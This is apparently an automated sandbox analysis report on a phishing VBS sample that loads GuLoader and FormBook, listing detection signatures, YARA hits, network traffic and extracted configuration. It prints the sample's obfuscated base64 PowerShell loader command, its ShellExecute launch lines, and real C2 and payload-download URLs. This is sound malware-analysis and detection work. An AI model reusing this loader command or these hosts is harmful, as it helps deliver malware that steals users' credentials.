Windows Analysis Report
New _Inquiry P.O4622.vbs

Overview

General Information

Sample Name: New _Inquiry P.O4622.vbs
Analysis ID: 557838
MD5: 24e935f7534a81a7fd4e32daeab208a5
SHA1: 251ac05ebc8c963418dccddda127d2a81b5097db
SHA256: 5e6d8684c3f71ca6a76d22d1ddc536f302738a3027d22a5b1ce1852c9c551d99
Tags: GuLoadervbs
Infos:

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Potential evasive VBS script found (sleep loop)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.usyeslogistics.com/k6sm/"], "decoy": ["mingshengjewelry.com", "ontimecleaningenterprise.com", "alyssa0.xyz", "ptecex.xyz", "dukfot.online", "pvcpc.com", "iowalawtechnology.com", "nestletranspotation.com", "mysithomes.com", "greenlakespaseattle.com", "evofishingsystems.com", "unilytcs.com", "ordemt.com", "dentalbatonrouge.com", "pictureme360.net", "chalinaslacatalana.com", "newmirrorimage.xyz", "pinklaceandlemonade.com", "rapinantes.com", "yzicpa.com", "josephosman.com", "robsarra.com", "shumgroup.net", "flooringnewhampshire.com", "onceadayman.com", "audiomacklaunch.xyz", "hurryburry.com", "golfvid.info", "tutortenbobemail.com", "tatlitelasorganizasyon.com", "tqgtdd.space", "classicalruns.com", "xx3tgnf.xyz", "galwayartanddesign.com", "qidu.press", "crypto-obmennik.com", "dn360rn001.com", "tridim.tech", "phamhome.com", "mediadollskill.com", "loveatmetaverse.com", "electric4x4parts.com", "azulymargarita.com", "isadoramel.com", "rubyclean.com", "officiallydanellewright.com", "wu8d349s67op.xyz", "detetivepyther.com", "wondubniumgy463.xyz", "registry-finance3.com", "ultracoding.com", "open-4business.com", "supremelt.online", "pangfeng.xyz", "morneview.com", "northfloridapsychic.com", "kg4bppuh.xyz", "friv.asia", "epsilonhomecare.com", "hbina.com", "beachhutprinting.com", "sophoscloudoptix.net", "managemarksol.site", "palestyna24.info"]}
Source: 00000013.00000000.950104658.0000000002A00000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://owanlab.com/bin_DziiNe252.bin"}
Multi AV Scanner detection for submitted file
Source: New _Inquiry P.O4622.vbs Virustotal: Detection: 8% Perma Link
Source: New _Inquiry P.O4622.vbs ReversingLabs: Detection: 13%
Yara detected FormBook
Source: Yara match File source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: https://owanlab.com/bin_DziiNe252.bin Avira URL Cloud: Label: malware
Source: unknown HTTPS traffic detected: 157.7.107.166:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp, svchost.exe
Source: Binary string: svchost.pdb source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.ordemt.com
Potential malicious VBS script found (has network functionality)
Source: Initial file: BinaryStream.SaveToFile Effortsre1, 2
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.usyeslogistics.com/k6sm/
Source: Malware configuration extractor URLs: https://owanlab.com/bin_DziiNe252.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /bin_DziiNe252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: owanlab.comCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: ieinstal.exe, 00000013.00000003.995641802.0000000002D9B000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061538373.0000000002D9B000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.996004923.0000000002D98000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.996129278.0000000002D96000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.1058453772.0000000002D9B000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png0~
Source: powershell.exe, 0000000D.00000002.1018870776.0000000004D21000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html0~
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester0~
Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp String found in binary or memory: https://gsmservice.tech/bin_DziiNe252.bin
Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp String found in binary or memory: https://owanlab.com/bin_DziiNe252.bin
Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp String found in binary or memory: https://owanlab.com/bin_DziiNe252.binhttps://gsmservice.tech/bin_DziiNe252.bin
Source: unknown DNS traffic detected: queries for: owanlab.com
Source: global traffic HTTP traffic detected: GET /bin_DziiNe252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: owanlab.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 157.7.107.166:443 -> 192.168.2.4:49823 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY

System Summary
barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\LQM-8D39\LQMlogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\LQM-8D39\LQMlogrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8085
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8085 Jump to behavior
Yara signature match
Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
